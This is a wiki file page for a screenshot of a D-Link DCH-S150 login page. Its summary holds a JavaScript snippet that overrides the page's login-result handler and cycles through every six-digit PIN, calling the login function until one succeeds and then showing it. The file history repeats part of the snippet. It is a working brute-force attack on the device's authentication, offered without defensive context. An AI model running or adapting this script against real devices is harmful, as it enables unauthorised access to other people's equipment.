File:DCH-S150 webpage login bf.png

Size of this preview: 800 × 500 pixels. Other resolutions: 2,560 × 1,600 pixels | 3,840 × 2,400 pixels.
Original file (3,840 × 2,400 pixels, file size: 639 KB, MIME type: image/png)
Summary
let PIN = 0, MAX = 999999;
//Override embedded function function send_login_cmd_result (http_req) {
$xml = $($.parseXML(http_req.responseText));
if(http_req && $xml.find(LOGIN + "Result").text() == "success"){
alert(PIN);
} else if ( ++PIN <= MAX ) {
$("#user_pwd").val(("000000"+PIN).substr(("000000"+PIN).length-6));
do_login();
}
}
// Start bruteforcing PIN send_login_cmd_result({"responseText": null});
Source
Screenshot Elvis Lab
File history
Click on a date/time to view the file as it appeared at that time.
| Date/Time | Thumbnail | Dimensions | User | Comment | |
|---|---|---|---|---|---|
| current | 18:25, 18 February 2020 | ![]() | 3,840 × 2,400 (639 KB) | JPDoe (talk | contribs) | let PIN = 0, MAX = 999999; //Override embedded function function send_login_cmd_result (http_req) { $xml = $($.parseXML(http_req.responseText)); if(http_req && $xml.find(LOGIN + "R... |
You cannot overwrite this file.
File usage
The following page uses this file: